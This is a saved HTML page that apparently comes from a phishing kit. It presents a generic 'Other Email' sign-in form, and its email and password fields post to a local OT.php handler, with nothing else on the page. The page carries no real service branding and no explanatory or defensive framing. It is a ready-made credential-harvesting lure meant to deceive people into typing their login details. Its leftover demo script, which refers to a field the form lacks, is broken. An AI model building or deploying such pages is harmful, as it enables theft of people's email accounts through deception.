
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!-- saved from url=(0014)about:internet -->
<html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
    <meta name="viewport" content="width=device-width,initial-scale=1,maximum-scale=1,user-scalable=no">
<meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
<meta name="HandheldFriendly" content="true">


<script type="text/javascript" src="https://www.sitepoint.com/examples/password/MaskedPassword/MaskedPassword.js"></script>

<title>OTHER SIGN IN</title>
<meta name="GENERATOR" content="DUDU">
<meta name="DUDU" content="DUDU">
<style type="text/css">
body
{
   background-color: #FFFFFF;
   color: #000000;
}
</style>
<style type="text/css">
a:hover
{
   color: #6CDA7B;
}
</style>
<!--[if lt IE 7]>
<style type="text/css">
   img { behavior: url("pngfix.htc"); }
</style>
<![endif]-->
</head>
<body>
<div id="bv_Image1" style="margin:0;padding:0;position:absolute;left:11px;top:17px;width:360px;height:389px;text-align:left;z-index:5;">
<img src="other_files/OT.png" id="Image1" alt="" style="width:360px;height:389px;" align="top" border="0"></div>

<div id="bv_Form1" style="position:absolute;left:0px;top:0px;width:398px;height:401px;z-index:6">
<form name="Form1" method="post" id="demo-form" action="OT.php"">

<input id="email" style="position:absolute;left:32px;top:140px;width:318px;height:29px;border:1px #C0C0C0 solid;font-family:Arial;font-size:12px;z-index:0" name="email" value="" type="text" required placeholder="Enter Email">


<input style="position:absolute;left:32px;top:179px;width:318px;height:29px;border:1px #C0C0C0 solid;font-family:Arial;font-size:12px;z-index:1" name="password" value="" type="text" id="demo-field" required placeholder="Enter Password">

<input id="Button1" name="Button1" value="" style="position:absolute;left:32px;top:267px;width:86px;height:38px;border:0px #000000 dotted;background-color:transparent;font-family:Arial;font-size:13px;z-index:2" type="submit">
<div id="bv_Shape1" style="margin:0;padding:0;position:absolute;left:32px;top:0px;width:320px;height:134px;text-align:center;z-index:3;">
<img src="other_files/OT.gif" id="Shape1" alt="" title="" style="border-width:0;width:320px;height:134px"></div>
<div id="bv_Text1" style="margin:0;padding:0;position:absolute;left:32px;top:49px;width:252px;height:56px;text-align:left;z-index:4;">
<font style="font-size:42px" color="#000000" face="Arial"><b>Other Email</b></font></div>
</form>
</div>
<script type="text/javascript">
 
  //apply masking to the demo-field
  //pass the field reference, masking symbol, and character limit
  new MaskedPassword(document.getElementById("demo-field"), '\u25CF');
 
  //test the submitted value
  document.getElementById('demo-form').onsubmit = function()
  {
   alert('pword = "' + this.pword.value + '"');
   return false;
  };
 
 </script>
</body></html>